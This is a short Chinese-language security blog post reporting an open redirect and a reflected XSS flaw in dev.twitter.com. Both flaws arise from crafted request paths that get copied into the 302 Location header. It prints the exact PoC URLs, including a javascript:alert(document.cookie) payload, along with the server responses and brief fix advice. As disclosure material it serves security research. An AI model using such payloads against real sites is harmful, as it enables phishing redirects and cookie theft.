• 欢迎访问挑战自我博客网站,安全研究,web渗透,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入挑战自我博客网站 网站主页

[twitter]关于HTTP头部的重定向漏洞与XSS漏洞

挖洞经验 挑战自我 2170次浏览 已收录 0个评论

1、漏洞简介

这个漏洞发生在请求的链接中,需要用户的交互点击,是由点击的请求链接传递给302页面的location值,从而导致的漏洞

2、漏洞证明

2.1、重定向漏洞

首先请求如下链接:

https://dev.twitter.com/https:/%5cblackfan.ru/

然后http会做出如下响应:

HTTP/1.1 302 Found
connection: close
...
location: https:/\blackfan.ru

这就导致了重定向漏洞,影响的浏览器包括:Chrome, FireFox, Opera

2.2、XSS漏洞

首先请求如下链接:

https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/

然后http会做出如下响应:

HTTP/1.1 302 Found
connection: close
...
location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)
...


<p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>.  If not click the link.

如下图所示:
[twitter]关于HTTP头部的重定向漏洞与XSS漏洞

3、修复建议

一是通过在链接中的Location值中创建一个不正确的端口,这样可以阻止火狐浏览器的重定向漏洞;
二是在链接的跳转中,对相关的链接进行严格过滤。


挑战自我博客, 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明[twitter]关于HTTP头部的重定向漏洞与XSS漏洞
喜欢 (8)
支付宝[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址